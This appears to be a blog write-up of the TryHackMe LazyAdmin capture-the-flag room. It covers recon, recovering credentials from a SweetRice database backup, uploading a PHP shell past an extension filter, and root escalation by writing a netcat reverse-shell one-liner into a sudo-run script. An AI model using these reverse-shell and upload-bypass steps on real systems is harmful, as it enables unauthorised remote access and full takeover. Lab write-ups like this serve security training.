LazyAdmin (Try Hack Me)

GrimTheRipper
3 min readSep 13, 2024

--

Perform an Nmap scan to find services and open ports, you can use the following command in

nmap -sV <target>

Once port 80 was discovered to be open, we used the dirsearch tool for scan the directory files.

python3 dirsearch.py -u <target> -x 400,401,403

Then We opened the web browser with path “ /content ”

Following CMS Sweetrice’s discovery, we searched for an exploit to take the next action.

Go to http://IP_target/content/inc/mysql_backup

Download : mysql_bakup_20191129023059–1.5.1.sql 2019–11–29 12:30 4.7K

Check the mysql_bakup_20191129023059–1.5.1.sql data information within by using the commandline.

cd Downloads
cat mysql_bakup_20191129023059-1.5.1.sql

Decode with md5.Finally we locate the credential | manager: Password123

Then interesting with SweetRice 1.5.1 — Arbitrary File Upload

In the source code, it indicates that the path to the login page is /as .Then go to this path directory and login.

go to media center for upload

The allowed file extensions for upload are…

Then go to upload malicious php file.

open port 1234 to listening

Upload the file

After intercepting a http request using the burpsuite application, modify the file extensions to upload is .php5 then select “Forward” button.

Finally we got the shell.

Next, we’ll move on to the privilege escalation

use sudo -l

We locate and make changes to file backup.pl.

We will executie file sh

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Replace to my ip

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f

Write the new file to rev shell

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f" > /etc/copy.sh

open netcat and wait

at revShall use commandline “sudo perl /home/itguy/backup.pl”

go back to waiting netcat and finally got root

Finally we’re got root.

--

--

GrimTheRipper
GrimTheRipper

Written by GrimTheRipper

You get the best out of others when you give the best of yourself

No responses yet